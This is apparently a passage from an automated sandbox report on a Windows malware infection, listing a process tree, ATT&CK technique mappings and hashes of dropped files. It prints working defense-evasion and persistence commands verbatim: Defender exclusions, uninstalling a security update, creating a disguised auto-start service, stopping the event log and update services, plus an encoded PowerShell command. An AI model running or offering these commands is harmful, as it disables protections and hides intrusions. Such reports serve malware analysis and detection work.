  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2500
- C:\Windows\System32\a\ghjaedjgaw.exe
  "C:\Windows\System32\a\ghjaedjgaw.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies system certificate store
  PID:1208
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\System32\a\ghjaedjgaw.exe" & rd /s /q "C:\ProgramData\0R9H4EU37QIM" & exit
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2060
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 10
      4⤵
      Delays execution with timeout.exe
      PID:324
- C:\Windows\System32\a\DuckMatter.exe
  "C:\Windows\System32\a\DuckMatter.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2972
- C:\Windows\System32\a\microsoft-onedrive.exe
  "C:\Windows\System32\a\microsoft-onedrive.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  PID:1968
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcABiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAYwBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAZwBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdwB5ACMAPgA="
    3⤵
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    PID:1596
- - C:\Users\Admin\AppData\Local\Temp\Built.exe
    "C:\Users\Admin\AppData\Local\Temp\Built.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2660
- - C:\Users\Admin\AppData\Local\Temp\onedrive.exe
    "C:\Users\Admin\AppData\Local\Temp\onedrive.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:1664
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      PID:932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:548
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2576
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "KOPWGCIF"
      4⤵
      Launches sc.exe
      PID:2624
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2508
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2956
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "KOPWGCIF"
      4⤵
      Launches sc.exe
      PID:2656
- C:\Windows\System32\a\boost.exe
  "C:\Windows\System32\a\boost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2776
- C:\Windows\System32\a\CE5M.exe
  "C:\Windows\System32\a\CE5M.exe"
  2⤵
  - Executes dropped EXE
  PID:2620
- - C:\Users\Admin\AppData\Roaming\All function.exe
    "C:\Users\Admin\AppData\Roaming\All function.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1928
  - - C:\Users\Admin\AppData\Roaming\ALL slumzick.exe
      "C:\Users\Admin\AppData\Roaming\ALL slumzick.exe"
      4⤵
      Executes dropped EXE
      PID:2116
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2252
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2628
- C:\Windows\System32\a\CE5Mv2.exe
  "C:\Windows\System32\a\CE5Mv2.exe"
  2⤵
  - Executes dropped EXE
  PID:2280
- - C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
    "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
    3⤵
    - Executes dropped EXE
    PID:1328
  - - C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe
      "C:\Users\Admin\AppData\Roaming\FullOption_2.1Xenos.exe"
      4⤵
      Executes dropped EXE
      PID:952
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1068
- - C:\Users\Admin\AppData\Roaming\svchost.exe
    "C:\Users\Admin\AppData\Roaming\svchost.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:324
- C:\Windows\System32\a\Fulloptionv2.exe
  "C:\Windows\System32\a\Fulloptionv2.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:1392
- - C:\Users\Admin\AppData\Local\Temp\._cache_Fulloptionv2.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_Fulloptionv2.exe"
    3⤵
    PID:2084
  - - C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe
      "C:\Users\Admin\AppData\Roaming\Fulloptionnew_by elegance.exe"
      4⤵
      PID:1688
  - - C:\Users\Admin\AppData\Roaming\svchost.exe
      "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1884
- C:\Windows\System32\a\33.exe
  "C:\Windows\System32\a\33.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2864
- C:\Windows\System32\a\image.exe
  "C:\Windows\System32\a\image.exe"
  2⤵
  - Checks BIOS information in registry
  - Executes dropped EXE
  PID:376
- C:\Windows\System32\a\wp.exe
  "C:\Windows\System32\a\wp.exe"
  2⤵
  - Executes dropped EXE
  PID:844
- C:\Windows\System32\a\LaZagne.exe
  "C:\Windows\System32\a\LaZagne.exe"
  2⤵
  PID:2364
- C:\Windows\System32\a\mimikatz.exe
  "C:\Windows\System32\a\mimikatz.exe"
  2⤵
  PID:1064
- C:\Windows\System32\a\final.exe
  "C:\Windows\System32\a\final.exe"
  2⤵
  PID:1708
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 1708 -s 32
    3⤵
    PID:1768
- C:\Windows\System32\a\Akagi32.exe
  "C:\Windows\System32\a\Akagi32.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2532
- C:\Windows\System32\a\gp.exe
  "C:\Windows\System32\a\gp.exe"
  2⤵
  PID:2340
- C:\Windows\System32\a\Akagi64.exe
  "C:\Windows\System32\a\Akagi64.exe"
  2⤵
  PID:2216

C:\Windows\system32\taskeng.exe
taskeng.exe {D68BB422-2D23-4EC3-B0D0-3D86A448DA69} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
1⤵
PID:2924

C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:1708
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:3044
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2480
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:2216
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:2032
- C:\Windows\system32\conhost.exe
  conhost.exe
  2⤵
  PID:2572

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
PID:2636
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:1172
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:784
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:568
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:376
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:2556
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:1928
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:3004
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:2432
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:672
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:1540
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1260
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1860
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2060

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2452

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
867B

MD5
c5dfb849ca051355ee2dba1ac33eb028

SHA1
d69b561148f01c77c54578c10926df5b856976ad

SHA256
cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b

SHA512
88289cdd2c2dd1f5f4c13ab2cf9bc601fc634b5945309bedf9fc5b96bf21697b4cd6da2f383497825e02272816befbac4f44955282ffbbd4dd0ddc52281082da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
12e454764414912cc0de5cf6c726da3b

SHA1
9d5c82e9313c81f58f18680418b422d772597630

SHA256
190a3b8669744b16038d65f6f29f2e587354438ec2cdc9624d958b5cdfb5d71b

SHA512
42f4f8dbbcdd3d30508ed39725f7441aa659e15692065b5075fc07f36b4a438e5a53293e5438cc39fa43d0cb1426b4b86f7cdec401d6d94dabdd7bab5ff725da

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3ee6eefdd8951b181f159b5c1bb163c3

SHA1
3bffb03fda8aa8b919e6d4e6a1e08018065a21f2

SHA256
8cf8ec3fd14018771341431902f12b8be3c68f7b25b5760f3a24578240ab5b1d

SHA512
ae9040bbe0681705b43574f5e06753594fa51554ecbe17068130fcc408c214fc5f542272d132e5235211e0019fb5265d19bba0cbca0ae2bf2940cc2386cf175a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
de1e5bd6e72085a1ca0d468699b5a08a

SHA1
8552afe89f6ce12e76e53795a356ae2c91c6b365

SHA256
34e7952fef1540f5c0e2d1c61ac920cac4771e140eea08be57d1bf2d83fc4154

SHA512
475c8d94f66dc32b944fe9f830a94cd94506955108e90350ad8621703d5400e326469635c9f5dcac7834f7139547049b6d8d18e161e5d80f5afcb8a2b02d8942

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
dd55ff0370a31fedb2323648e84eb638

SHA1
ecf1308d3b3bf192877984b67a3addf39748f338

SHA256
af6163d754cba1af7fb0cec10825c536d37355f1a067e701d2844472c407963c

SHA512
7e56f5229c7a26f88a647fd4e4b3445d96eaf21a534238d5ee25a55ebdece2dc48bf549849da325b98f8a6029b9d05d7f00b0431155a9544a5308ce7fb6fcbdc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1

Filesize
242B

MD5
75554d301abb97a9f524cb159e94bac0

SHA1
49d7795f7593f816a3b266f6fe414f74c9a28602

SHA256
de0247060182030fe4f6e871d509580d3bf0c560caf4920a5afc7de62ddc58d2

SHA512
cbb443274dc9ef412441094a0b713e210018c4a146a4fd73c79c2b52b6f8812c7ca322f9e783f23745dc5b344131dac20d39f78b269c6b6f89fd0385471c457d

Download Submit
C:\Users\Admin\AppData\Local\RageMP2663\RageMP2663.exe

Filesize
915KB

MD5
b06e67f9767e5023892d9698703ad098

SHA1
acc07666f4c1d4461d3e1c263cf6a194a8dd1544

SHA256
8498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb

SHA512
7972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943

Download Submit
C:\Users\Admin\AppData\Local\Temp\80C.tmp\80D.tmp\80E.bat

Filesize
46B

MD5
1b4e67ccd28b70ef7e83bd18803722c3

SHA1
fa63275147f9e4ad22bd6f3737a5bcc8253e9411

SHA256
2524c6dd306b590c364e03faa37f924f90bbc0b13db426976e3159af86f13f19

SHA512
e8b7ed56ee207da397e93d4c8d97ff60ab35f6cb7c22e72b75c39f7e28b035edd85ad9c5fcfd3a3cd688e69caecbe0451e2abb64be7220d54b41e0ac6e95df84

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab78DA.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\D96E.tmp\D96F.tmp\D970.bat

Filesize
391B

MD5
37b1b79bd305ad40763f735f6bdc5492

SHA1
3dbcd6540a68974280c4f24abf80a3519e6797ed

SHA256
72572317f1b18b3348c3cf7de977b8742b0b47fd79b92576d7e4787b588fa08b

SHA512
c674031ca54187111a004017286429aeeeb0df104f659f60d1b251269927f4309cbb1cb5d466d2f5909436ab02206c13071031ae822696b92ed96059529311e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Dominant.cmd

Filesize
12KB

MD5
02ccb333e74fc5c7668a5e11ec5bb982

SHA1
4777e487afa0d81fddfe350d22d9476b217c4a52

SHA256
749f7d74c7e4e2e3177d7eefb8fb53e707283ed96144d101235d9d72cdd40f34

SHA512
540ead28d2e0bc06e82394833d54ca93765a3f2d3b10ddf57af93da002d7a34f533db000865f6d53854205928999031a466ab95c3cff9ed075f05b7c46fe0f74

Download Submit
C:\Users\Admin\AppData\Local\Temp\FransescoPast.txt

Filesize
17B

MD5
d4641f6d2a944c4210b11ee7aaee3c15

SHA1
19d708d846a2671ec98b9a13d5bf63462c679210

SHA256
72e3e6aece4c302c1d83287214a17be03f7903834deaf0608e01e5ae861de186

SHA512
80a3aae95312f1cf463dc091334fb3f131f68ac59dfcada8515cd557b2b83781d57377edb66344a7b4c78e4be636c0136aabf6315bb965780d6f232a99033198

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar78EC.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\gsD615.tmp

Filesize
24KB

MD5
e667dc95fc4777dfe2922456ccab51e8

SHA1
63677076ce04a2c46125b2b851a6754aa71de833

SHA256
2f15f2ccdc2f8e6e2f5a2969e97755590f0bea72f03d60a59af8f9dd0284d15f

SHA512
c559c48058db84b1fb0216a0b176d1ef774e47558f32e0219ef12f48e787dde1367074c235d855b20e5934553ba023dc3b18764b2a7bef11d72891d2ed9cadef

Download Submit
C:\Users\Admin\AppData\Local\Temp\onedrive.exe

Filesize
2.5MB

MD5
cc23600e896342e8d4086178b2f57b2f

SHA1
8588238e481bfabcd8d832ff1e06ff05ee9afd4b

SHA256
de28354336aff91e295da45fc95d80ccdee6f1f6d0e552699e376db906551614

SHA512
4e7ebfd51e2cd30c336ca21ef9fc3318abab72a1aaedead5fc1de750ef3e63e20b11adac9a1a5a786a77f30ec257c0c36736944896cd6ce4d3f0ae6afff7b10c

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ZK75GYUQWUHP5ZTLOO3.temp

Filesize
7KB

MD5
a8edd2460f5f00c12b1735fc7a720343

SHA1
02d4cf70d15154e33fdcf58cbebc65e48747d60f

SHA256
f477bc4b944ddad5ce5494f28c3174ae2cb5f4864e0d6d324365f9a4d94d4df3

SHA512
a036e9e43de43560f11db2dfa2bf6301b1882ac041a26c135892aebc94edd4e3583298ae1339d20bd1d6172906a459106e20bb6d9e58faf01ae77b3fb4dd6073

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
16bbc642f6dc79dab9411f7a79665bc7

SHA1
1c27d65ff2fd6927afaefce08ab3ee99dcf1867b

SHA256
f5852233404826bc1dd7e77a1c4ea249ae11053f23bd03e2f4788fca31c67539

SHA512
3cb9f189eb617c6c7ec475a0f35d0dbd404b6199bfb5d3f784bd2ff58c00cbadac647b6f30604a5b680e7334de1a1f3a9e020ebfe5d87b94fe9cb0dbade4e631

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SL5UZATV3OJM8V7B7FE9.temp

Filesize
7KB

MD5
41274d0191c52356a6cff2da75226a9c

SHA1
8dcd8154284001593f6b48c76359a2df83ba09d4

SHA256
a6b11afda0054e7674a4c4a40797848a5cf45eef82c0b7376eda9e6a2b0ed0c4

SHA512
15d295c68926382758490fce2f9fdb5561feb5839a50994f85450b71bceb9ebd5bf55e8a519976560a95da6e69baf8b8dcd1575cb875554effa4fb94d8d349e8

Download Submit
C:\Users\Admin\AppData\Roaming\app

Filesize
4B

MD5
4d853d9c7197ee7fa81c6535b1f7d655

SHA1
eac3d866e991967b385f3dd22da25e410d8f7f49

SHA256
5abdb6175f820f0ac3d8647fbb1f7a0bcc91757a782a8a145570944ca6a00c96

SHA512
dc5a09d8586eb9f591f6e00187817c19f693e9328a1b2e5838c61c0b234e9608eecc45bbf7f4a90912e9a456d0ab469ed2503bafb4988b276cec8d5f0b18fda7

Download Submit
C:\Users\Admin\AppData\Roaming\portable_util.exe

Filesize
2.6MB

MD5
68e2c71187e1d5b07d9e76c71d27b2d6

SHA1
de984e4bb73cef8f9db3325218e2d1126d12f29c

SHA256
befc7ec9f3f4db7875c7c7cb5d76ce0a424f95ac3cbf5ca98c8b59b19e2d89d8

SHA512
5d1e6d32b595c03af6898dff4834b38d0ec0b7b6ea68cc68e73362dbb8723af68c77f5f547af3bd722b17697e8f9b53d4eeec9fa7ad0624fcbbe217dc48dd37d

Download Submit
C:\Users\Admin\AppData\Roaming\setup.exe

Filesize
3.7MB

MD5
bffd87c157f19834c73d14240cea6025

SHA1
bb30b17e7ec5225e35b4993339650d9dd70a5c60

SHA256
e3df5de8d2221dd3061eeb011c1d849edef4a609d29c542cb5cf3d82afede465

SHA512
eee16246d2244b6618a7105f1787c995a2c45e322acc2826bcc2d493c187146b0a52ba6003b217d31bbde4ab6a08260fa65a093afed5f5e3e1897bc4cc3818e0

Download Submit
C:\Windows\SysWOW64\Files\121.exe

Filesize
321KB

MD5
3b8f4ae6dd1ef9625f8ba8f6c9eb8515

SHA1
d3dbc4f0348dce6c99dba536f8e86deb707be6ab

SHA256
f3ea334bb3adf2fabae612dd6155d15a05e5e1998a1d9d7b326e42ac4291c57e

SHA512
96deb5213595a0fecebb6cbf27ae709d71a3615ee898d90d63092530f1087830274e70b8ad55ba5ffade537c04604c9fa60696c01307bc9f4e77743fd7cc54b2

Download Submit
C:\Windows\SysWOW64\Files\8fc809.exe

Filesize
432KB

MD5
aad42bb76a48e18ab273efef7548363d

SHA1
0b09fabe2a854ded0c5b9050341eb17ced9f4c09

SHA256
f75fbc05bbf3a9d9f9e2b67108f4d54eaf7582d10799385a5656b48ac10e86c6

SHA512
5e58548ad6ff2a0237eea4d8a82695eab5031dca24a25c714f614b9e8fac0e90528cda0d80054f447288fcd9166e72729df32956784159b17ec378ae4278f216

Download Submit
C:\Windows\SysWOW64\Files\Microsoft_Hardware_Launch.exe

Filesize
93KB

MD5
7e9aea4310d362cc62c7eef48b9bea7d

SHA1
0d0f4ba4460f30731da5f5b7a2df5538fc39509c

SHA256
7ebeecbc8be6ef0639cdfc58a6e7adb22786de3268efbc71a84e2407abf30c0e

SHA512
7e4a2f2076adebf213e2d86f5e8924924db0f609cabd4e55a4707a293410cad83dd93c3c82a4e93fa9d580454e9e20549c621dbc3b7733081874b99ff747b415

Download Submit
C:\Windows\SysWOW64\Files\chrome_93.exe

Filesize
8.1MB

MD5
1248d4a486d79f6828c60b8385a1c2c6

SHA1
62c5e5305a75c60c8295aed427d5cc284ee97f1b

SHA256
addaf820ebd6d96728a5fb379579ee1536fb0993f6041d9ceef6e9e439c612a4

SHA512
16bd84d597f601d6ab81204e8431a270dac9ed6331d95dc1944ba0a814b139d68431dabb3249d5e789218bce3c8a3379855f1a142686de109d23bcbb64e6adb5

Download Submit
C:\Windows\SysWOW64\Files\exit.exe

Filesize
89KB

MD5
22ba0f15051ed784999a0a4c5dad86e5

SHA1
b08af6b30a9cada411e39d3d946d67c4f8a3241d

SHA256
dd66f1bd9ec09caf2b4e213493ae194b131bfa60577a7d0d1fb6122f03a92c7f

SHA512
bcf9b0951e69db3a44d3f0888f26baa51475003bf652556b1b32f315ec2798a688349fdabb0879ded73f4935c57590a548f93683aa83abcc7ffbb776a1babed7

Download Submit
C:\Windows\SysWOW64\Files\hbfgjhhesfd.exe

Filesize
288KB

MD5
2b3a191ee1f6d3b21d03ee54aa40b604

SHA1
8ecae557c2735105cc573d86820e81fcff0139c4

SHA256
f0d45f8340cd203ee98c7765267175576d8017df5166f425f8a7483cb35a91c8

SHA512
31f621fd96bf2964529607ae64a173c4a99f3976a91283a3609edc3799d98f59de80da6266ca10c26e5c8733644f1764aab00c7ba3e4dc5456573b9b20b6a393

Download Submit
C:\Windows\SysWOW64\Files\joiner.exe

Filesize
93KB

MD5
ceabf00e91c6d219345af40a28da43e8

SHA1
1203c6455e46b4a7007dea71f81849d50e3e48c1

SHA256
a4d2060b27fbf0500f87ddf80278ebd9f7c0861d487250b0048a4fd87fa79b8f

SHA512
6098e888ebde819d137d9132d7f27dee52c9214c64f76aad6ddac713426ad62a10cf37c36d9bcd568156b5c83f43cad80cb4608705e1eea7cd220a00ca04707f

Download Submit
C:\Windows\SysWOW64\Files\lkyhjksefa.exe

Filesize
1.2MB

MD5
0844b5ba505c4c86733c017eb2014648

SHA1
1eaa9c33ee8bc1e541a0a2566d6bc990bfbde825

SHA256
c5bba04cd1c49270dff46e068c8cf64e1c87927d3bdb0e40a219d3be28f7538c

SHA512
967dcf26e8a4a8dd20fc33ed4c051a6c514fbbe03c4efd30a381985a1f074b0b71bc8f95bc1f10fa75f46bced9a84ccf40a2b524f91e3a44b84a531be5d475d4

Download Submit
C:\Windows\SysWOW64\Files\shell.exe

Filesize
72KB

MD5
b46f3e8790d907a8f6e216b006eb1c95

SHA1
a16301af03d94abe661cc11b5ca3da7fc1e6a7bb

SHA256
f400dfc798338bf8c960fe04bafe60a3f95d4facd182ab08448b4918efe35262

SHA512
16345afb33b8626893da0700b9ac7580cdea3b3d42ace6d137abb9f6e99a0e446d9af2fbb98979b7ea815cab07fb6eb368a590166bdf048deacd7fd63c429de9

Download Submit
C:\Windows\System32\a\.exe

Filesize
4.2MB

MD5
781da1c06e074c6dfbb0c6b797df9eb7

SHA1
38e79b6ea79d430c6858a976afb0bb60a5aa3320

SHA256
9888ce35d905f7a831dd0ff96757c45c6bd7adea987720b05141f3522c480b18

SHA512
69df833452ea77393c54ffa449dc625720ac0fb449a3ee1da20d867c208555edf5845076ea00dc5a6d05254cf87fdd39fed12e33d3c6f726ba2e42060a9c2b3e

Download Submit
C:\Windows\System32\a\33.exe

Filesize
3.0MB

MD5
73b80a68c704e6e1f91595db16205501

SHA1
0b2c8007a42fab9d50b46325caeb08b687cb04c8

SHA256
bac17a64fdf5cb62e16e053919f01b724dc3abbf1bc0e33e20a8f0cbdc7e0fc0

SHA512
31119e1bfb48b2293b7cefce4788ebb6d512eb2f8423766944ea67bea8db777e499f8df4484bb037a165c11e63f648728f1f59005185a066099761aea8d58b11

Download Submit
C:\Windows\System32\a\Bootxr.exe

Filesize
204KB

MD5
cab92c144fd667cef7315c451bed854b

SHA1
532ec7af97764480129b12f75f9f8c1eeb570cb8

SHA256
49f94ed44fa9a834f246a5a038aa971b26f928d32ed438faacccba2398753297

SHA512
18bb1aed2020f3a0e65c64e29ef122dc8c8f870409eaff22277c306682d96fb331ae44f87aee34f5e21ff1f05cb856d0376f2012944c893609596e39e8457c43

Download Submit
C:\Windows\System32\a\Coc%20Coc.exe

Filesize
3.8MB

MD5
1a15dd31838dee5ca5aae7d4771cb451

SHA1
97b45e54f4c4a8142a00db663a67642ee2e8adaf

SHA256
0698347cb68341078844c04d3003ae98502d3efe181b654a4de3271c3c43e887

SHA512
